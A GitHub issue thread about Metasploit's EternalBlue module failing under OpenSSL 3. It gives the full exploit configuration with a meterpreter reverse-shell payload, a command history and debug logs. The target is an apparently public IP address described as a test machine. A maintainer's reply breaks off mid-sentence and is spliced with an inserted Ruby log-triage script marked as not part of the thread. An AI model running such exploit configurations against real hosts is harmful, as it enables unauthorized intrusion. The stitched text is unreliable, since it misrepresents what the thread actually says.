Metasploit error when using eternalblue on a vulnerable test machine and weird lines when running metasploit #16868

Closed
HEX-VON opened this issue Aug 5, 2022 · 7 comments
Labels: bug; openssl3 (Tracking issues related to OpenSSL 3's backwards breaking changes); Stale (Marks an issue as stale, to be closed if no action is taken)

Comments


HEX-VON commented Aug 5, 2022

I am new to pen testing and I have been getting this error when I try to use eternalblue on a test machine and can't find a fix for it. I also get weird lines when running metasploit.

Steps to reproduce

How'd you do it?

  1. use ms17_010_eternalblue

  2. run the exploit after configuring the payload and exploit options

OS: Windows 7 Professional 7600 of the test machine

Were you following a specific guide/tutorial or reading documentation?

nope
If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.

Expected behavior

the exploit should run normally
What should happen?
gain access to test machine

Current behavior

getting error after running the exploit
What happens instead?
exploit fails with error

Metasploit version

Framework: 6.2.9-dev
Console : 6.2.9-dev

Additional Information

metasploit version is 6.2.9

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/windows/smb/ms17_010_eternalblue

[windows/smb/ms17_010_eternalblue]
CheckModule=auxiliary/scanner/smb/smb_ms17_010
EXITFUNC=thread
WfsDelay=5
WORKSPACE=
VERBOSE=false
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=62.141.46.121
RPORT=445
SSL=false
SSLServerNameIndication=
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
SMBUser=
SMBPass=
SMBDomain=
VERIFY_TARGET=true
VERIFY_ARCH=true
ProcessName=spoolsv.exe
GroomAllocations=12
MaxExploitAttempts=3
GroomDelta=5
PAYLOAD=windows/x64/meterpreter/reverse_tcp
LHOST=192.168.1.12

Database Configuration

The database contains the following information:

Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

60     set loglevel 3
61     search eternalblue
62     use 0
63     set rhosts 62.141.46.121
64     run
65     debug

Framework Errors

The following framework errors occurred before the issue occurred:

[08/05/2022 18:12:38] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:12:38] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:15:32] [e(0)] core: Failed to connect to the database: No database YAML file
[08/05/2022 18:15:35] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:15:35] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:15:35] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:17:10] [e(0)] core: Failed to connect to the database: No database YAML file
[08/05/2022 18:17:12] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:17:12] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
[08/05/2022 18:17:12] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0

Web Service Errors

The following web service errors occurred before the issue occurred:

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_eternalblue]: bind to bind
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_eternalblue]: noconn to bind
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_eternalblue]: none to bind
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/smb/ms17_010_eternalblue]: tunnel to bind
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/bind_tcp_uuid is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_eternalblue]: reverse to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_eternalblue]: bind to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_eternalblue]: noconn to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_eternalblue]: none to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/smb/ms17_010_eternalblue]: tunnel to tunnel
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_http is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_eternalblue]: reverse to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_eternalblue]: bind to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_eternalblue]: noconn to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_eternalblue]: none to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/smb/ms17_010_eternalblue]: tunnel to tunnel
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_https is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_eternalblue]: reverse to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_eternalblue]: bind to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_eternalblue]: noconn to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_eternalblue]: none to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/smb/ms17_010_eternalblue]: tunnel to reverse
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_tcp is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_eternalblue]: reverse to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_eternalblue]: bind to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_eternalblue]: noconn to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_eternalblue]: none to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/smb/ms17_010_eternalblue]: tunnel to reverse
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_rc4 is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_eternalblue]: reverse to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_eternalblue]: bind to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_eternalblue]: noconn to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_eternalblue]: none to reverse
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/smb/ms17_010_eternalblue]: tunnel to reverse
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_uuid is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_eternalblue]: reverse to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_eternalblue]: bind to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_eternalblue]: noconn to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_eternalblue]: none to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/smb/ms17_010_eternalblue]: tunnel to tunnel
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_winhttp is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_eternalblue]: reverse to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_eternalblue]: bind to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_eternalblue]: noconn to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_eternalblue]: none to tunnel
[08/05/2022 18:17:29] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/smb/ms17_010_eternalblue]: tunnel to tunnel
[08/05/2022 18:17:29] [d(1)] core: Module windows/x64/vncinject/reverse_winhttps is compatible with windows/smb/ms17_010_eternalblue
[08/05/2022 18:17:36] [i(2)] core: Reloading auxiliary module scanner/smb/smb_ms17_010. Ambiguous module warnings are safe to ignore
[08/05/2022 18:17:36] [d(0)] core: SMB version(s) to negotiate: [1]
[08/05/2022 18:17:37] [d(0)] core: Negotiated SMB version: SMB1

Web Service Logs

The following web service logs were recorded before the issue occurred:

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Framework: 6.2.9-dev
Ruby: ruby 3.0.4p208 (2022-04-12 revision 3fa771dded) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.3 3 May 2022
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
@HEX-VON HEX-VON added the bug label Aug 5, 2022
@adfoster-r7 adfoster-r7 added the openssl3 Tracking issues related to OpenSSL 3's backwards breaking changes label Aug 5, 2022
@adfoster-r7
Contributor

This should be fixed by #16800 which is available in the latest release of Metasploit

I'm not sure when the fix will be available in Kali, I believe in a week or so.

@HEX-VON
Author

HEX-VON commented Aug 6, 2022

> This should be fixed by #16800 which is available in the latest release of Metasploit
>
> I'm not sure when the fix will be available in Kali, I believe in a week or so.

I tried the steps in #16800 but still no luck sadly

@HEX-VON
Author

HEX-VON commented Aug 7, 2022

updated to metasploit v6.2.12-dev and still no luck

@adfoster-r7
Contributor

The ssl warnings should be fixed in 6.2.14; The target may need reset to get a reverse shell with
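
Added example (not part of the thread and not Metasploit's own code): a small Ruby triage script for `framework.log` lines in the format pasted in this issue, separating the repeated OpenSSL 3 `PKeyError` entries from other errors and checking the reported Framework version against the 6.2.14 release named in the comment above. The sample log is constructed from lines shown in the issue, and all function names are hypothetical.

```ruby
require 'rubygems' # Gem::Version for version comparison

# Constructed sample in the framework.log format shown in the issue.
SAMPLE_LOG = <<~LOG
  [08/05/2022 18:15:32] [e(0)] core: Failed to connect to the database: No database YAML file
  [08/05/2022 18:15:35] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
  [08/05/2022 18:15:35] [e(0)] core: OpenSSL::PKey::PKeyError pkeys are immutable on OpenSSL 3.0
  [08/05/2022 18:17:36] [d(0)] core: SMB version(s) to negotiate: [1]
  this line is not in framework.log format
LOG

# [timestamp] [severity(level)] source: message
LINE_RE = /\A\[(?<ts>[^\]]+)\] \[(?<sev>[a-z])\((?<lvl>\d)\)\] (?<src>\w+): (?<msg>.*)\z/
OPENSSL3_SIGNATURE = 'pkeys are immutable on OpenSSL 3.0'
# Assumption taken from the maintainer's comment: the warnings are fixed in 6.2.14.
OPENSSL3_FIXED_IN = Gem::Version.new('6.2.14')

# Returns a hash for a well-formed log line, nil for anything else.
def parse_line(line)
  m = LINE_RE.match(line.chomp)
  return nil unless m

  { ts: m[:ts], severity: m[:sev], level: m[:lvl].to_i, source: m[:src], message: m[:msg] }
end

# Counts error-severity ("e") entries by message; malformed lines are skipped.
def error_counts(log_text)
  entries = log_text.each_line.map { |l| parse_line(l) }.compact
  entries.select { |e| e[:severity] == 'e' }
         .each_with_object(Hash.new(0)) { |e, counts| counts[e[:message]] += 1 }
end

# True when the reported Framework version is older than the fixed release.
def predates_fix?(framework_version)
  Gem::Version.new(framework_version.sub(/-dev\z/, '')) < OPENSSL3_FIXED_IN
end

# Summarises a log: error counts, whether the OpenSSL 3 error is present,
# and whether upgrading is expected to clear it.
def triage(log_text, framework_version)
  counts = error_counts(log_text)
  openssl3 = counts.keys.any? { |msg| msg.include?(OPENSSL3_SIGNATURE) }
  { counts: counts, openssl3_errors: openssl3,
    upgrade_expected_to_help: openssl3 && predates_fix?(framework_version) }
end
```

Calling `triage(File.read(path), '6.2.9-dev')` on a real log gives the same summary; errors left over after the OpenSSL 3 entries are excluded (here the missing database YAML file) are the ones to investigate separately.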

@github-actions

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Oct 18, 2022
@github-actions

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.
